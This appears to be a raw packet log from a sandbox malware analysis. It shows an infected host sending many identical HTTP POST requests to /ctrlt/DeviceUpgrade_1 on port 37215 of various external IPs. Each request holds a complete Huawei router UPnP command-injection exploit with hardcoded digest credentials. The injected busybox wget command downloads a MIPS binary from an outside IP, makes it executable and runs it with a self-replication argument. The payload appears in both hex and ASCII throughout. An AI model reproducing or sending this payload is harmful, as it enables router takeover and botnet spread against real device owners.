                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.485035896 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    62192.168.2.1432896221.104.140.12537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.131676912 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.490330935 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    63192.168.2.1442818157.160.52.7837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.133868933 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.480134010 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    64192.168.2.143321241.236.232.10337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.133868933 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.480134010 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    65192.168.2.1456736197.132.201.19337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.133868933 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.484842062 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    66192.168.2.1439902157.152.213.14837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.135195971 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.501240015 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
